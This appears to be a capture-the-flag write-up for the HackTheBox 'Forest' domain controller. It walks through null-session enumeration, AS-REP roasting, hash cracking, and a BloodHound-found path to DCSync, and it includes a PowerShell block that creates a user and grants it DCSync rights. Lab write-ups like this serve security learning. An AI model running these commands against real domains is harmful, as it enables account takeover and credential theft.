# Forest

## Gaining Access

Nmap scan:

Lots of ports as per normal DC scanning.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-de273dfdb789fc48e64f61fd31edceff1f648de6%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

### SMB Null Session

Using `enum4linux` with no credentials, we find that it accepts null credentials and we can enumerate some users.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-35068d23f208a34eaf6750e86931262a7e0b70fd%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

With a user list, we can attempt to do AS-REP Roasting before moving on, and we would find a hash for the `svc-alfresco` user.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-9878c140814139651b7c4cadc25ca51f914138c0%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Then, we can use `john` to crack the hash easily.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-426b2fd285f9cdf3c10a90225726d67e813a35f9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Afterwards, we can `evil-winrm` in as this user.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-996b44760b9ae0e34980a1b83fad704aa9c69f16%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Bloodhound Enum

I ran SharpHound on the machine to do collection and enumeration of the domain for me. After loading up Bloodhound and uploading the data, this is what we find:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-e01c3f648d8c96dc7dbe49ea06881f80f3b222bc%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

The user we have control over seems to have GenericAll permissions over the Exchange Windows Permissions group, which has WriteDacl permissions over the DC.

The attack is as follows:

* Add a user to the domain and into the Exchange Windows Permissions user group
* Add DCSync permissions for that user

This can be achieved using some Windows commands and Powerview:

```powershell
net user hello hello@123 /add /domain
net group "Exchange Windows Permissions" /add hello
$pass = convertto-securestring 'hello@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\hello', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hello -Rights DCSync
```

Afterwards, we would basically have a new user to dump the administrator hash using `secretsdump.py` thanks to DCSync permissions.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-29f11acd4a3bd5b1008b38e3ca382fd3f6a903f7%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Then, we can Pass The Hash easily to gain access as the Administrator.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-828c30a7cec4897b008b129076a6a9d24480931a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>